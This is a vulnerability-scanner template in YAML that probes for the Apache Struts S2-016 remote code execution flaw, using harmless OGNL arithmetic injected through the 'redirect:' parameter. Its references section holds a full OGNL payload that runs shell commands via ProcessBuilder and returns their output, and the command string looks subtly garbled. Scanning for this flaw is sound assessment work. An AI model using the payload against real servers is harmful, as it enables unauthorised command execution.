id: struct-s2-016
type: list
info:
  name: Apache Struct S2-016 - RCE
  risk: High
variables:
  - pocs: |
      index.action?redirect:%24%7B1337*1337*1337*1337%7D
      home.action?redirect:%24%7B1337*1337*1337*1337%7D
      /?redirect:%24%7B1337*1337*1337*1337%7D
      /index.action?redirect:%24%7B1337*1337*1337*1337%7D

requests:
  - method: GET
    redirect: false
    url: >-
      {{.URL}}{{.pocs}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "3195402929761")

references:
  - link: https://cxsecurity.com/issue/WLB-2017070032
  - payload: |
      /?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','" second = "'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
  - author: theblackturtle
